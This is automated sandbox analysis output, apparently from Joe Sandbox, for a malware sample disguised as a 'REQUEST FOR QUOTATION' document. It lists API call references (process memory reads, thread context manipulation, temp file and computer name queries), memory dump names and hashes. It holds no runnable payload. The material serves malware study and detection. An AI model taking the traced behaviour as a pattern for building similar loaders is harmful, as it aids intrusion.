                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C91B1B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2438371351-0
                                                                                                                                                                                                                              • Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                                                                                                                                                                                                                              • Instruction ID: e2bf9a1d68680d4ccc1258a6348224c7f9527144d525dc2bbbd452d0f5582ee8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D622A30A14219DBEB24CFA4C845BEEB376EF58300F1091A9D51DEB3A0E7759E81CB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1559183368-0
                                                                                                                                                                                                                              • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                                                                                                                              • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043E263
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043E2AA
                                                                                                                                                                                                                                • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                                                                                              • API String ID: 2861923089-1757145024
                                                                                                                                                                                                                              • Opcode ID: 2c5a2aed3b36ab55450484f8535f2eb57f4f2cdbe78b7764f884aa3e23acbe99
                                                                                                                                                                                                                              • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c5a2aed3b36ab55450484f8535f2eb57f4f2cdbe78b7764f884aa3e23acbe99
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                                                                                                                              • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                                                                                                                                                              • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                                                                                                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                                                                                                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004696A2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004696A9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00469714
                                                                                                                                                                                                                                • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                                                                                                                                                                • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0046971C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1552873950-0
                                                                                                                                                                                                                              • Opcode ID: bd4c49df742902bd1a4c81879b5c0e86d9ac0e84342a6c31abf43c5ac4bedca4
                                                                                                                                                                                                                              • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd4c49df742902bd1a4c81879b5c0e86d9ac0e84342a6c31abf43c5ac4bedca4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2782032738-0
                                                                                                                                                                                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                                                                                                              • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32 ref: 00AEB2BA
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00AEB2E0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$PointerWrite
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 539440098-0
                                                                                                                                                                                                                              • Opcode ID: 27ca2344b8c5bdb51cad0b38c98f0eb6fb186ceee049767ba69641deff298474
                                                                                                                                                                                                                              • Instruction ID: 4da0cda3189752a5cbcb8e9bbee964a47ad8ca4c87b85c223dd89df4526afc72
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27ca2344b8c5bdb51cad0b38c98f0eb6fb186ceee049767ba69641deff298474
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD31B27042C3C1AED7118B67881D76BBFE06F92725F48894DE5D49A691D3B488089773
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %I
                                                                                                                                                                                                                              • API String ID: 0-63094095
                                                                                                                                                                                                                              • Opcode ID: 9b00972baca6db95c3dc95f644f288aa016a196c43dd654122fd255416ce8d5b
                                                                                                                                                                                                                              • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b00972baca6db95c3dc95f644f288aa016a196c43dd654122fd255416ce8d5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                              • String ID: AU3!P/I$EA06
                                                                                                                                                                                                                              • API String ID: 4104443479-1914660620
                                                                                                                                                                                                                              • Opcode ID: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                                                                                                                                                                                                                              • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0043EA39
                                                                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                                                                                                                                                                                                • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                                                                                                                                                                • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                                                                                              • String ID: X
                                                                                                                                                                                                                              • API String ID: 3777226403-3081909835
                                                                                                                                                                                                                              • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                                                                                                                                                              • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __fread_nolock_memmove
                                                                                                                                                                                                                              • String ID: EA06
                                                                                                                                                                                                                              • API String ID: 1988441806-3962188686
                                                                                                                                                                                                                              • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                                                                                              • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                                                                                                                              • String ID: aut
                                                                                                                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                              • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                                                                                              • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                                                                                                                                                              • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                                              • Opcode ID: 9f2105e45e93ce964b8f5a36561a6c3adc96587229b2a1b845b9796bf3bd6c93
                                                                                                                                                                                                                              • Instruction ID: dea3b4b053af8c982c19e6a86f1e72179f9a7c61185683217c05bd6b5c059823
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f2105e45e93ce964b8f5a36561a6c3adc96587229b2a1b845b9796bf3bd6c93
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0121F1F0ECD3446FDA3556149C06FB5FEE4EF61B10F8846EAB588161E2DD647D088263
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00404370
